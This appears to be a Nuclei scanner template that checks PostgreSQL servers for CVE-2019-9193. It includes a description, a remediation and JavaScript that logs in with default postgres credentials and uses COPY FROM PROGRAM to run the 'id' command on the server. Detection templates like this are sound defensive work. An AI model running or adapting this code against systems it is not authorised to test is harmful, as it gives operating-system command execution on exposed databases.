id: CVE-2019-9193

info:
  name: PostgreSQL 9.3-12.3 Authenticated Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
  impact: |
    Authenticated superusers can execute arbitrary operating system commands through the COPY TO/FROM PROGRAM function, potentially achieving complete server compromise.
  remediation: |
    Restrict access to superuser and pg_execute_server_program privileges, or disable the COPY TO/FROM PROGRAM functionality if not required.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193
  metadata:
    verified: true
    max-request: 1
    shodan-query: "product:\"PostgreSQL\""
  classification:
    epss-score: 0.93645
    epss-percentile: 0.9985
  tags: cve,cve2019,js,network,postgresql,intrusive,vkev,vuln

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const postgres = require('nuclei/postgres');
      const client = new postgres.PGClient;
      const tbl = tbl_exec
      const qry = ["CREATE TABLE "+tbl+"(cmd_output text);", "COPY "+tbl + " FROM PROGRAM 'id';", "SELECT * FROM "+ tbl+";", "DROP TABLE IF EXISTS " +tbl+";",];
      for (const x of qry){
        connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, x);
        Export(connected);
      }

    args:
      Host: "{{Host}}"
      Port: 5432
      User: "{{usernames}}"
      Pass: "{{password}}"
      Db: "{{database}}"
      tbl_exec: "{{randbase(5)}}"

    payloads:
      usernames:
        - postgres
      database:
        - postgres
      password:
        - postgres

    attack: clusterbomb

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

      - type: word
        words:
          - "cmd_output"
# digest: 4a0a004730450221009445a0b2833b0225fb746a81e34a304094cb2b8ccea726e7356d64cdde78fe5502200f1850fcacbf2d38c658b9fa538abef1473db29d3f5d81107156fe904ccb82c7:922c64590222798bb761d5b6d8e72950